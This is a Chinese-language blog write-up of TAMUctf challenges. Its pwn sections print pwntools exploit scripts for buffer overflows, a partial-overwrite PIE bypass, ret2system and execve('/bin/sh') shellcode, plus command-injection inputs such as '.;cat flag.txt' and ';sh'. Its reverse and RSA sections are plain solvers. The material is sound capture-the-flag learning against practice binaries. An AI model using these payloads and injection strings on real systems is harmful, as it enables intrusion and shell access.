<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,writeup,pwn," />










<meta name="description" content="摸鱼，做题。 捡了几道简单的pwn题做，剩下的真做不出来，等着收一波大佬的wp">
<meta name="keywords" content="ctf,writeup,pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="TAMUctf">
<meta property="og:url" content="http://yoursite.com/2019/03/01/TAMUctf/index.html">
<meta property="og:site_name" content="Muirelle的博客">
<meta property="og:description" content="摸鱼，做题。 捡了几道简单的pwn题做，剩下的真做不出来，等着收一波大佬的wp">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://i.imgur.com/SQIi0yj.png">
<meta property="og:image" content="https://i.imgur.com/xQJCqGz.png">
<meta property="og:image" content="https://i.imgur.com/yRHY3j9.png">
<meta property="og:image" content="https://i.imgur.com/ntMOBrQ.png">
<meta property="og:image" content="https://i.imgur.com/1TKyhPl.png">
<meta property="og:image" content="https://i.imgur.com/RDsSxHS.png">
<meta property="og:image" content="https://i.imgur.com/ouowepD.png">
<meta property="og:image" content="https://i.imgur.com/XAENc0M.png">
<meta property="og:image" content="https://i.imgur.com/Liivdiy.png">
<meta property="og:image" content="https://i.imgur.com/Eg48enC.png">
<meta property="og:image" content="https://i.imgur.com/jJBBxVg.png">
<meta property="og:image" content="https://i.imgur.com/01juQCt.png">
<meta property="og:image" content="https://i.imgur.com/YOmtcay.png">
<meta property="og:image" content="https://i.imgur.com/ECQlpCq.png">
<meta property="og:updated_time" content="2019-04-01T13:42:13.086Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="TAMUctf">
<meta name="twitter:description" content="摸鱼，做题。 捡了几道简单的pwn题做，剩下的真做不出来，等着收一波大佬的wp">
<meta name="twitter:image" content="https://i.imgur.com/SQIi0yj.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/01/TAMUctf/"/>





  <title>TAMUctf | Muirelle的博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Muirelle的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/01/TAMUctf/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Muirelle">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Muirelle的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">TAMUctf</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-01T18:51:16+08:00">
                2019-03-01
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index">
                    <span itemprop="name">ctf</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/03/01/TAMUctf/" class="leancloud_visitors" data-flag-title="TAMUctf">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>摸鱼，做题。</p>
<p>捡了几道简单的pwn题做，剩下的真做不出来，等着收一波大佬的wp</p>
<a id="more"></a>
<h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="pwn1"><a href="#pwn1" class="headerlink" title="pwn1"></a>pwn1</h2><p>题目：<strong><a href="https://tamuctf.com/files/b804e1ab7d43ff479292094d9ec64526/pwn1" target="_blank" rel="noopener">https://tamuctf.com/files/b804e1ab7d43ff479292094d9ec64526/pwn1</a></strong></p>
<p><img src="https://i.imgur.com/SQIi0yj.png" alt=""></p>
<p>找偏移覆盖v5的值即可</p>
<p><img src="https://i.imgur.com/xQJCqGz.png" alt=""><br>通过padding找到偏移</p>
<p>最后脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">'pwn.tamuctf.com'</span>,<span class="number">4321</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (r.recv())</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="string">'Sir Lancelot of Camelot'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (r.recv())</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="string">'To seek the Holy Grail.'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (r.recv())</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="string">'AAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'</span>+p32(<span class="number">0xdea110c8</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (r.recv())</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>有个疑问，不知道为什么最后加了interactive才出flag，理论上应该直接出的，想不通。</p>
<h2 id="pwn2"><a href="#pwn2" class="headerlink" title="pwn2"></a>pwn2</h2><p>题目：<strong><a href="https://tamuctf.com/files/fe3b76a986798016f0b868da03a56c79/pwn2" target="_blank" rel="noopener">https://tamuctf.com/files/fe3b76a986798016f0b868da03a56c79/pwn2</a></strong></p>
<p><img src="https://i.imgur.com/yRHY3j9.png" alt=""><br>开的保护蛮多的</p>
<p><img src="https://i.imgur.com/ntMOBrQ.png" alt=""><br>gets读取用户输入</p>
<p><img src="https://i.imgur.com/1TKyhPl.png" alt=""><br>将长度最大为0x1f的数据复制到dest所指向的位置。如果dest所指字符串为’one’则调用函数<code>one</code>。整个函数流程差不多就这样。</p>
<p>这个return v3()很诱人啊，于是想把v3覆盖成函数<code>print_flag()</code>的地址。但是注意到源程序开了pie保护，没办法直接拿到<code>print_flag()</code>的地址。</p>
<p>注意观察一下dest和v3在栈上的位置，dest在ebp-0x2a。0x2a减去最大能输入的字符串长度0x1f等于0xb，而v3在ebp-0xc，也就是说v3的最后一个字节是可以被覆盖到的。</p>
<p>google了一下，知道了pie不会随机化地址的低12位。</p>
<p>利用这个特性，再加上发现<code>two</code>距离<code>print_flag()</code>很近，所以只需要把<code>two</code>地址的最后一个字节覆盖成<code>print_flag()</code>地址的最后一个字节就可以成功调用<code>print_flag()</code>函数了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">'pwn.tamuctf.com'</span>,<span class="number">4322</span>)</span><br><span class="line"></span><br><span class="line">print(r.recv())</span><br><span class="line"></span><br><span class="line">s = <span class="string">'aa'</span> + <span class="string">'a'</span>*<span class="number">4</span>*<span class="number">7</span> + <span class="string">'\xdc'</span></span><br><span class="line"></span><br><span class="line">r.sendline(s)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (r.recv())</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>同样也是加了interactive才能拿flag，有点奇怪。</p>
<h2 id="pwn5"><a href="#pwn5" class="headerlink" title="pwn5"></a>pwn5</h2><p>题目：<strong><a href="https://tamuctf.com/files/faf489a3ffea904aba9fea47647584b8/pwn5" target="_blank" rel="noopener">https://tamuctf.com/files/faf489a3ffea904aba9fea47647584b8/pwn5</a></strong></p>
<p>pwn4都不需要dump文件下来，连服务器直接做，在discord里面被大佬一通嘲笑2333。</p>
<p>pwn5就是pwn4的升级版，限定了可输入命令的长度为4，导致没办法像pwn4那样直接<code>.;cat flag.txt</code>就可以拿flag那么简单了。</p>
<p><img src="https://i.imgur.com/RDsSxHS.png" alt=""><br>没开pie，挺好的。（好像患上了pie恐惧症）</p>
<p><img src="https://i.imgur.com/ouowepD.png" alt=""><br>main函数里就只有一个<code>laas()</code>函数。读取不带反斜杠的字符串。</p>
<p><img src="https://i.imgur.com/XAENc0M.png" alt=""><br>函数<code>run_cmd</code>中直接调用了system，但是貌似不能直接在这个函数里搞事情，因为v2的长度被限制死了。</p>
<p>但是别忘了<code>laas()</code>里用了gets而且没开canary保护，所以直接覆盖返回值为system吧。。</p>
<p><img src="https://i.imgur.com/Liivdiy.png" alt=""><br>先找到’/bin/sh’的位置<strong>0x080bc140</strong></p>
<p>再找到system的地址：<strong>0x804ee30</strong></p>
<p>然后计算偏移：s位于ebp+0xd，所以ret位于0xd+0x4=0x11</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">'pwn.tamuctf.com'</span>,<span class="number">4325</span>)</span><br><span class="line"></span><br><span class="line">print(r.recv())</span><br><span class="line"></span><br><span class="line">s = <span class="string">'a'</span>*<span class="number">0x11</span> + p32(<span class="number">0x804ee30</span>) + <span class="string">'aaaa'</span> + p32(<span class="number">0x080bc140</span>)</span><br><span class="line"></span><br><span class="line">r.sendline(s)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (r.recv())</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>补充:看过wp后发现还是想复杂了。。。也是直接连服务器就能做。忘了ls可以不用加参数，所以连上服务器然后<code>;sh</code>完事。。。</p>
<h2 id="pwn3"><a href="#pwn3" class="headerlink" title="pwn3"></a>pwn3</h2><p>题目：<strong><a href="https://tamuctf.com/files/9dc4f5b5523625eb82f2d0de5e16291a/pwn3" target="_blank" rel="noopener">https://tamuctf.com/files/9dc4f5b5523625eb82f2d0de5e16291a/pwn3</a></strong></p>
<p>很简单的一道题结果最后才做出来。。。</p>
<p><img src="https://i.imgur.com/Eg48enC.png" alt=""><br>没开canary和nx</p>
<p><img src="https://i.imgur.com/jJBBxVg.png" alt=""><br>整个程序就只有这么一点，泄露了s处的栈地址。</p>
<p>一直在想怎么怎么泄露libc的基址好绕过pie，然而最简单的覆盖ret劫持流程加shellcode的组合却忘了(´_ゝ`)。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">'pwn.tamuctf.com'</span>,<span class="number">4323</span>)</span><br><span class="line"></span><br><span class="line">print(r.recvuntil(<span class="string">'Take this, you might need it on your journey '</span>))</span><br><span class="line"></span><br><span class="line">leak_stack = int(r.recvuntil(<span class="string">'!'</span>)[<span class="number">2</span>:<span class="number">-1</span>], <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">print(leak_stack)</span><br><span class="line"></span><br><span class="line">x = <span class="number">0x12a</span><span class="comment">#  #</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'</span></span><br><span class="line">payload = shellcode + <span class="string">'a'</span>*(x-len(shellcode)) + <span class="string">'aaaa'</span> + p32(leak_stack)</span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h1><h2 id="keygenme"><a href="#keygenme" class="headerlink" title="keygenme"></a>keygenme</h2><p>docker环境<strong><code>docker pull muirelle/advkeygen:latest</code></strong></p>
<p>到最后也没拿到这道题flag，反向验证没问题，一直不知道那里出错了，甚至最后开始怀疑起了服务器。</p>
<p>看了wp才知道是多了一个字节。分析一波原因。</p>
<p><img src="https://i.imgur.com/01juQCt.png" alt=""></p>
<p><img src="https://i.imgur.com/YOmtcay.png" alt=""></p>
<p><img src="https://i.imgur.com/ECQlpCq.png" alt=""></p>
<p>整个程序的流程大致如下：</p>
<p>读取用户输入字符串a1，限制长度在0x9到0x40之间。</p>
<p>经过<code>enc()</code>对a1每一字节的各种运算，最后返回被修改后的a1，再与字符串<code>[OIonU2_&lt;__nK&lt;KsK</code>作比较，相等的话就输出flag。</p>
<p>有个坑点，一不注意就会掉进去，就是换行符的问题。</p>
<p>由于一开始没有注意到程序中用了fgets来读取输入(fgets会读取换行符并在后面加上空字符，而gets会将换行符直接替换为空字符)，所以最后生成的字符串<code>[OIonU2_&lt;__nK&lt;KsK</code>的最后一个字节就是由换行符生成的。所以a1的长度其实只有上面那个字符串的长度-1，因为换行符会占一字节。</p>
<p>当时还专门写了一段c去正向测试是否能输出<code>[OIonU2_&lt;__nK&lt;KsK</code>，结果是可以正确输出的，但是没有意识到自己用的是scanf读取输入，所以导致strlen获取长度时少读取了一个换行符的长度，就一直没做出来。。。</p>
<p>最后解题脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">v5=<span class="string">'[OIonU2_&lt;__nK&lt;KsK'</span></span><br><span class="line"></span><br><span class="line">ans=<span class="string">''</span></span><br><span class="line">ans2 = <span class="string">''</span></span><br><span class="line">flag = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(v5)<span class="number">-1</span>):	<span class="comment">#就是因为这里少了一个-1</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">127</span>):</span><br><span class="line">        <span class="keyword">if</span>(i == <span class="number">0</span>):</span><br><span class="line">            <span class="keyword">if</span> ((((j + <span class="number">12</span>) * <span class="number">72</span> + <span class="number">17</span>) % <span class="number">70</span> + <span class="number">48</span>) == ord(v5[i])):</span><br><span class="line">                ans+=chr(j)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">if</span> ((((j + <span class="number">12</span>) * ord(v5[i<span class="number">-1</span>]) + <span class="number">17</span>) % <span class="number">70</span> + <span class="number">48</span>) == ord(v5[i])):</span><br><span class="line">                ans+=chr(j)</span><br><span class="line">    ans2+=ans[len(ans)<span class="number">-1</span>]</span><br><span class="line">    <span class="comment">#print (ans)</span></span><br><span class="line">    ans=<span class="string">''</span></span><br><span class="line"></span><br><span class="line">print(ans2)</span><br></pre></td></tr></table></figure>
<h1 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h1><h2 id="RSAaaay"><a href="#RSAaaay" class="headerlink" title="RSAaaay"></a>RSAaaay</h2><p>题目：</p>
<hr>
<p>Hey, you’re a hacker, right? I think I am too, look at what I made!</p>
<p>(2531257, 43)</p>
<p>My super secret message: 906851 991083 1780304 2380434 438490 356019 921472 822283 817856 556932 2102538 2501908 2211404 991083 1562919 38268</p>
<p>Problem is, I don’t remember how to decrypt it… could you help me out? </p>
<hr>
<p>这道题还算简单，趁着去学了一点rsa。由于没有反应过来解密后的数字是合并后的ascii码，和flag擦肩而过。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line">c = <span class="string">'906851 991083 1780304 2380434 438490 356019 921472 822283 817856 556932 2102538 2501908 2211404 991083 1562919 38268'</span></span><br><span class="line">pub = (<span class="number">2531257</span>,<span class="number">43</span>)</span><br><span class="line">p = <span class="number">509</span></span><br><span class="line">q = <span class="number">4973</span></span><br><span class="line">r = <span class="number">2525776</span></span><br><span class="line">e = <span class="number">43</span></span><br><span class="line">l = c.split(<span class="string">' '</span>)</span><br><span class="line"></span><br><span class="line">dec=<span class="string">''</span></span><br><span class="line">sig=<span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(l)):</span><br><span class="line">    dec += str((pow(int(l[i]),<span class="number">58739</span>,pub[<span class="number">0</span>])))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(dec)):</span><br><span class="line">    sig+=dec[i]</span><br><span class="line">    <span class="keyword">if</span>(int(sig) <span class="keyword">in</span> range(<span class="number">0x20</span>, <span class="number">0x7f</span>)):</span><br><span class="line">        print(chr(int(sig)),end=<span class="string">''</span>)</span><br><span class="line">        sig=<span class="string">''</span></span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/writeup/" rel="tag"># writeup</a>
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/02/pwnable-kr-Rookiss/" rel="next" title="Pwnable.kr[Rookiss]">
                <i class="fa fa-chevron-left"></i> Pwnable.kr[Rookiss]
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/02/安恒杯2019二月-pwn/" rel="prev" title="安恒杯2019二月-pwn">
                安恒杯2019二月-pwn <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Muirelle</p>
              <p class="site-description motion-element" itemprop="description">吾将上下而求索</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#pwn"><span class="nav-number">1.</span> <span class="nav-text">pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn1"><span class="nav-number">1.1.</span> <span class="nav-text">pwn1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn2"><span class="nav-number">1.2.</span> <span class="nav-text">pwn2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn5"><span class="nav-number">1.3.</span> <span class="nav-text">pwn5</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn3"><span class="nav-number">1.4.</span> <span class="nav-text">pwn3</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Reverse"><span class="nav-number">2.</span> <span class="nav-text">Reverse</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#keygenme"><span class="nav-number">2.1.</span> <span class="nav-text">keygenme</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#crypto"><span class="nav-number">3.</span> <span class="nav-text">crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#RSAaaay"><span class="nav-number">3.1.</span> <span class="nav-text">RSAaaay</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Muirelle</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("K1WEvzezolboN84rQYlF0Dvv-gzGzoHsz", "KnwfedBiA348tAxLpapkotlB");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
